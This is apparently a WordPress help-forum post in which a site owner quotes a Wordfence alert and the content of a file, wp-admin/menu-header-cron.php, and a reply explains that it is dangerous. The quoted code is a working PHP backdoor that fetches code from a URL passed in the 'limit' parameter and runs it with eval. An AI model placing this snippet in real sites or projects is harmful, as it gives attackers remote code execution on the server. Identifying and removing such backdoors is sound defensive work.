WordPress warning – Backdoor:PHP/numeric.rce.8527


I have been looking at the Wordfence scan results on my site this morning and see 17 instances which seem to imply malware has ben installed on the server. I would be surprised if this were to be the case but wanted to be sure:

One example,

Filename: wp-admin/menu-header-cron.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php\x0aif (isset($_GET[‘limit’])) {\x0a eval(file_get_contents(‘http://&#8217; . $_GET[‘limit’]));\x0a}

The issue type is: Backdoor:PHP/numeric.rce.8527
Description: Remote code execution malware

Looking at the file in question, the content of this file is:

if (isset($_GET['limit'])) {
eval(file_get_contents('http://' . $_GET['limit']));

Can anyone confirm whether this is an innocent file or something I need to quarantine/delete?

Also, has was this file created? It implies that remote code has the capability of creating new files in the wp-admin/ sub folder? Is there not a simple way to prevent this which would preclude any further instances.

Many thanks for any input

>Solution :

That snippet is reading the limit parameter then passing is as an URL to get a file. And eval function will just execute it

So its pretty dangerous

Leave a ReplyCancel reply